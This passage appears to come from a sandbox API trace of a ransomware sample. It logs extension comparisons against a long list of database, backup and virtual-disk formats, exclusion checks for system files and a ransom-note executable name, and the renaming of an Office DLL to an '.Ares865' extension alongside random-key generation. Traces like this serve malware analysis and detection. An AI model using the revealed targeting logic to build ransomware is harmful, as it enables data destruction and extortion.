(lpString="nyf") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.051] lstrlenW (lpString="odb") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.051] lstrlenW (lpString="odb") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.051] lstrlenW (lpString="oqy") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.051] lstrlenW (lpString="ora") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.051] lstrlenW (lpString="orx") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.051] lstrlenW (lpString="owc") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.051] lstrlenW (lpString="p96") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.051] lstrlenW (lpString="p97") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.051] lstrlenW (lpString="pan") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.051] lstrlenW (lpString="pdb") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.051] lstrlenW (lpString="pdm") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.051] lstrlenW (lpString="pnz") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.052] lstrlenW (lpString="qry") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.052] lstrlenW (lpString="qvd") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.052] lstrlenW (lpString="rbf") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.052] lstrlenW (lpString="rctd") returned 4 [0086.052] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.052] lstrlenW (lpString="rod") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.052] lstrlenW (lpString="rodx") returned 4 [0086.052] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.052] lstrlenW (lpString="rpd") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.052] lstrlenW (lpString="rsd") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.052] lstrlenW (lpString="sas7bdat") returned 8 [0086.052] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.052] lstrlenW (lpString="sbf") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.052] lstrlenW (lpString="scx") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.052] lstrlenW (lpString="sdb") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.052] lstrlenW (lpString="sdc") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.052] lstrlenW (lpString="sdf") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.052] lstrlenW (lpString="sis") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.052] lstrlenW (lpString="spq") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.052] lstrlenW (lpString="te") returned 2 [0086.052] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.052] lstrlenW (lpString="teacher") returned 7 [0086.052] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.052] lstrlenW (lpString="tmd") returned 3 [0086.052] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.053] lstrlenW (lpString="tps") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.053] lstrlenW (lpString="trc") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.053] lstrlenW (lpString="trc") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.053] lstrlenW (lpString="trm") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.053] lstrlenW (lpString="udb") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.053] lstrlenW (lpString="udl") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.053] lstrlenW (lpString="usr") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.053] lstrlenW (lpString="v12") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.053] lstrlenW (lpString="vis") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.053] lstrlenW (lpString="vpd") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.053] lstrlenW (lpString="vvv") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.053] lstrlenW (lpString="wdb") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.053] lstrlenW (lpString="wmdb") returned 4 [0086.053] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.053] lstrlenW (lpString="wrk") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.053] lstrlenW (lpString="xdb") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.053] lstrlenW (lpString="xld") returned 3 [0086.053] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.053] lstrlenW (lpString="xmlff") returned 5 [0086.053] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.Ares865") returned 79 [0086.053] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.054] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94048) returned 1 [0086.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.055] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.056] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17260, lpName=0x0) returned 0x15c [0086.057] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17260) returned 0x190000 [0086.062] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.063] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.064] CloseHandle (hObject=0x15c) returned 1 [0086.064] CloseHandle (hObject=0x118) returned 1 [0086.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.065] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="..") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="windows") returned -1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="temp") returned -1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="boot") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="perflogs") returned -1 [0086.065] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.065] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0086.065] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0086.065] lstrcpyW (in: lpString1=0x2cce468, lpString2="MSOINTL.REST.trx_dll" | out: lpString1="MSOINTL.REST.trx_dll") returned="MSOINTL.REST.trx_dll" [0086.065] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0086.065] lstrlenW (lpString="Ares865") returned 7 [0086.066] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.066] lstrlenW (lpString=".dll") returned 4 [0086.066] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".dll") returned 1 [0086.066] lstrlenW (lpString=".lnk") returned 4 [0086.066] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0086.066] lstrlenW (lpString=".ini") returned 4 [0086.066] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".ini") returned 1 [0086.066] lstrlenW (lpString=".sys") returned 4 [0086.066] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".sys") returned 1 [0086.066] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0086.066] lstrlenW (lpString="bak") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.066] lstrlenW (lpString="ba_") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.066] lstrlenW (lpString="dbb") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.066] lstrlenW (lpString="vmdk") returned 4 [0086.066] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.066] lstrlenW (lpString="rar") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.066] lstrlenW (lpString="zip") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.066] lstrlenW (lpString="tgz") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.066] lstrlenW (lpString="vbox") returned 4 [0086.066] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.066] lstrlenW (lpString="vdi") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.066] lstrlenW (lpString="vhd") returned 3 [0086.066] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.066] lstrlenW (lpString="vhdx") returned 4 [0086.066] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.066] lstrlenW (lpString="avhd") returned 4 [0086.066] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.066] lstrlenW (lpString="db") returned 2 [0086.066] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.066] lstrlenW (lpString="db2") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.067] lstrlenW (lpString="db3") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.067] lstrlenW (lpString="dbf") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.067] lstrlenW (lpString="mdf") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.067] lstrlenW (lpString="mdb") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.067] lstrlenW (lpString="sql") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.067] lstrlenW (lpString="sqlite") returned 6 [0086.067] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.067] lstrlenW (lpString="sqlite3") returned 7 [0086.067] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.067] lstrlenW (lpString="sqlitedb") returned 8 [0086.067] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.067] lstrlenW (lpString="xml") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.067] lstrlenW (lpString="$er") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.067] lstrlenW (lpString="4dd") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.067] lstrlenW (lpString="4dl") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.067] lstrlenW (lpString="^^^") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.067] lstrlenW (lpString="abs") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.067] lstrlenW (lpString="abx") returned 3 [0086.067] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.067] lstrlenW (lpString="accdb") returned 5 [0086.067] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.067] lstrlenW (lpString="accdc") returned 5 [0086.067] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.067] lstrlenW (lpString="accde") returned 5 [0086.067] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.067] lstrlenW (lpString="accdr") returned 5 [0086.068] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.068] lstrlenW (lpString="accdt") returned 5 [0086.068] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.068] lstrlenW (lpString="accdw") returned 5 [0086.068] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.068] lstrlenW (lpString="accft") returned 5 [0086.068] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.068] lstrlenW (lpString="adb") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.068] lstrlenW (lpString="adb") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.068] lstrlenW (lpString="ade") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.068] lstrlenW (lpString="adf") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.068] lstrlenW (lpString="adn") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.068] lstrlenW (lpString="adp") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.068] lstrlenW (lpString="alf") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.068] lstrlenW (lpString="ask") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.068] lstrlenW (lpString="btr") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.068] lstrlenW (lpString="cat") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.068] lstrlenW (lpString="cdb") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.068] lstrlenW (lpString="ckp") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.068] lstrlenW (lpString="cma") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.068] lstrlenW (lpString="cpd") returned 3 [0086.068] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.068] lstrlenW (lpString="dacpac") returned 6 [0086.068] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.068] lstrlenW (lpString="dad") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.069] lstrlenW (lpString="dadiagrams") returned 10 [0086.069] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.069] lstrlenW (lpString="daschema") returned 8 [0086.069] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.069] lstrlenW (lpString="db-journal") returned 10 [0086.069] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.069] lstrlenW (lpString="db-shm") returned 6 [0086.069] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.069] lstrlenW (lpString="db-wal") returned 6 [0086.069] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.069] lstrlenW (lpString="dbc") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.069] lstrlenW (lpString="dbs") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.069] lstrlenW (lpString="dbt") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.069] lstrlenW (lpString="dbv") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.069] lstrlenW (lpString="dbx") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.069] lstrlenW (lpString="dcb") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.069] lstrlenW (lpString="dct") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.069] lstrlenW (lpString="dcx") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.069] lstrlenW (lpString="ddl") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.069] lstrlenW (lpString="dlis") returned 4 [0086.069] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.069] lstrlenW (lpString="dp1") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.069] lstrlenW (lpString="dqy") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.069] lstrlenW (lpString="dsk") returned 3 [0086.069] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.069] lstrlenW (lpString="dsn") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.070] lstrlenW (lpString="dtsx") returned 4 [0086.070] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.070] lstrlenW (lpString="dxl") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.070] lstrlenW (lpString="eco") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.070] lstrlenW (lpString="ecx") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.070] lstrlenW (lpString="edb") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.070] lstrlenW (lpString="epim") returned 4 [0086.070] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.070] lstrlenW (lpString="fcd") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.070] lstrlenW (lpString="fdb") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.070] lstrlenW (lpString="fic") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.070] lstrlenW (lpString="flexolibrary") returned 12 [0086.070] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.070] lstrlenW (lpString="fm5") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.070] lstrlenW (lpString="fmp") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.070] lstrlenW (lpString="fmp12") returned 5 [0086.070] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.070] lstrlenW (lpString="fmpsl") returned 5 [0086.070] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.070] lstrlenW (lpString="fol") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.070] lstrlenW (lpString="fp3") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.070] lstrlenW (lpString="fp4") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.070] lstrlenW (lpString="fp5") returned 3 [0086.070] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.071] lstrlenW (lpString="fp7") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.071] lstrlenW (lpString="fpt") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.071] lstrlenW (lpString="frm") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.071] lstrlenW (lpString="gdb") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.071] lstrlenW (lpString="gdb") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.071] lstrlenW (lpString="grdb") returned 4 [0086.071] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.071] lstrlenW (lpString="gwi") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.071] lstrlenW (lpString="hdb") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.071] lstrlenW (lpString="his") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.071] lstrlenW (lpString="ib") returned 2 [0086.071] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.071] lstrlenW (lpString="idb") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.071] lstrlenW (lpString="ihx") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.071] lstrlenW (lpString="itdb") returned 4 [0086.071] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.071] lstrlenW (lpString="itw") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.071] lstrlenW (lpString="jet") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.071] lstrlenW (lpString="jtx") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.071] lstrlenW (lpString="kdb") returned 3 [0086.071] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.071] lstrlenW (lpString="kexi") returned 4 [0086.071] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.071] lstrlenW (lpString="kexic") returned 5 [0086.071] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.072] lstrlenW (lpString="kexis") returned 5 [0086.072] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.072] lstrlenW (lpString="lgc") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.072] lstrlenW (lpString="lwx") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.072] lstrlenW (lpString="maf") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.072] lstrlenW (lpString="maq") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.072] lstrlenW (lpString="mar") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.072] lstrlenW (lpString="marshal") returned 7 [0086.072] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.072] lstrlenW (lpString="mas") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.072] lstrlenW (lpString="mav") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.072] lstrlenW (lpString="maw") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.072] lstrlenW (lpString="mdbhtml") returned 7 [0086.072] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.072] lstrlenW (lpString="mdn") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.072] lstrlenW (lpString="mdt") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.072] lstrlenW (lpString="mfd") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.072] lstrlenW (lpString="mpd") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.072] lstrlenW (lpString="mrg") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.072] lstrlenW 